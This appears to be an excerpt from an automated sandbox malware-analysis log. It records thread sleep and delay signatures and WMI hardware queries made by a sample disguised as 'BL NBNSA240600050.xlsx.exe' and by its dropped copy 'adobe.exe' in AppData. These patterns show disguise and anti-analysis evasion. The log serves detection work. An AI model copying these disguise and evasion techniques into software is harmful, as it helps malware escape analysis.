                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594985
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594860
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594610
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593985
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWindow / User API: threadDelayed 814Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWindow / User API: threadDelayed 1740Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWindow / User API: threadDelayed 1962Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWindow / User API: threadDelayed 7895Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 896Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 2575Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 7264Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 918Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 456Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 1998
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 7819
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -239891s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -239770s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -239641s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -239531s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -239422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -239313s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -239188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -239063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -238953s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -238844s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -238719s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -238587s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -238266s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -238157s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152Thread sleep time: -238047s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep count: 36 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6200Thread sleep count: 1962 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -599859s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -599733s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -599625s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6200Thread sleep count: 7895 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -599516s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -599406s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -599297s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -599187s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -599078s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -598969s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -598844s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -598734s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -598625s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -598515s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -598406s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -598297s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -598185s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -598078s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -597969s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -597844s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -597734s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -597625s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -597515s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -597406s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -597297s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -597188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -597063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -596938s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -596828s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -596719s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -596594s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -596484s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -596375s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -596264s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -596156s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -596047s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -595937s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -595828s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -595719s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -595594s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -595484s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -595315s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -595203s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -595094s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -594984s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -594875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -594766s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -594656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -594547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392Thread sleep time: -594438s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5828Thread sleep count: 896 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236Thread sleep time: -239875s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5828Thread sleep count: 285 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236Thread sleep time: -239765s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236Thread sleep time: -239656s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236Thread sleep time: -239546s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236Thread sleep time: -239312s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236Thread sleep time: -239187s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236Thread sleep time: -239078s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 6020Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep count: 35 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -599891s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7304Thread sleep count: 2575 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7304Thread sleep count: 7264 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -599766s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -599655s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -599531s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -599422s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -599311s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -599188s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -599063s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -598953s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -598828s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -598718s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -598609s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -598500s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -598336s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -598219s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -598094s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -597984s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -597872s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -597765s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -597656s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -597547s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -597438s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -597313s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -597188s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -597063s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -596938s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -596828s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -596719s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -596594s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -596484s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -596375s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -596266s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -596156s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -596047s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -595938s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -595813s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -595703s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -595594s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -595469s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -595344s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -595234s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -595125s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -595016s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -594891s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -594766s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -594649s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -594546s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -594436s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288Thread sleep time: -594328s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464Thread sleep time: -239843s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464Thread sleep time: -239733s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464Thread sleep time: -239625s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464Thread sleep time: -239513s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464Thread sleep time: -239406s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464Thread sleep time: -239296s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464Thread sleep time: -239177s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep count: 33 > 30
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -30437127721620741s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -600000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7676Thread sleep count: 1998 > 30
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -599889s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7676Thread sleep count: 7819 > 30
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -599781s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -599672s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -599563s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep count: 36 > 30
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -599438s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -599313s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -599188s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -599078s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -598969s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -598844s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -598735s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -598610s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -598485s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -598360s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -598235s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -598110s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -597985s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -597860s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -597735s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -597610s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -597485s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -597360s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -597235s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -597110s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -596985s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -596860s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -596735s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -596610s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -596485s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -596360s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -596235s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -596110s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -595985s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -595860s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -595735s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -595610s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -595485s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -595360s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -595235s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -595110s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -594985s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -594860s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -594735s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -594610s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -594485s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -594360s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -594235s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -594110s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668Thread sleep time: -593985s >= -30000s
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
